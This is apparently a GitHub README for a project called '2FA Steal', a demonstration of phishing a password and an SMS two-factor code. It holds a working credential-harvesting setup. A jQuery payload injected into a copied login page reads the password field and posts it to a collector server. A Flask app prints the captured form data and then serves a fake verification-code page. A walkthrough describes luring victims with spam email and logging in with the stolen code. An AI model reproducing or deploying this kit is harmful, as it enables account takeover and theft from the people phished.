2FA Steal

Description

Just a simple demonstration inspired from the video of John Hammond to bypass 2FA SMS Authentication. You can watch the video Here

Languages and Utilities Used

- Linux - Python - Java

Environments Used

- Windows 10 - kali

Procedure:

- Took the HTML code from the browser view page source
- Added the json payload inside the code

payload that we use in the html pages, bear in mind to change the input type based on the webpages

<script src ="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
	
	$('button').click(function(e){
		e.preventDefault()

		auth = $('input[type=password]').val()
		
		$.post(
			"http://localhost:5000/auth",
				{"password":auth},
				function(data,status){
					window.location = "http://localhost:5000/login"
					}
			);
		return false
	})
</script>

- Created a simple flask python app and hosted it

from flask import Flask
from flask import render_template, send_file, make_response, request

app = Flask(__name__)

#auth is defined below and is defined in the js payload to server in the web. If want to change the objects defines, make sure to chnage it in the payloads that used in the webpages

@app.route("/auth", methods=["POST"])
def auth():
	print(request.form.to_dict())
	return "ok"

@app.route("/")
def index():
	response = make_response(send_file("reset.html"))
	response.headers.add("Access-Control-Allow-Origin", "*")
	return response

@app.route("/login")
def login():
	return send_file("2fa.html")

if __name__ == "__main__":
	app.run()

- Accessed the IP outside the machine and grabbed the input on the terminal

Process Walkthrough:

- Hosting the app publically
Server1
- The webpage being accessed by the victim by clicking on a spam email or dodgy link and try logging in with the password
victim1
- The attacker is prompted with the password of the account in the terminal when the victim press next
server2
- The victim is then prompted with the page to enter the Verification code that is being sent to the phone
victim2
- On clicking next, the attacker would be able to get the 2FA code and can be used to login to victim’s account
victim2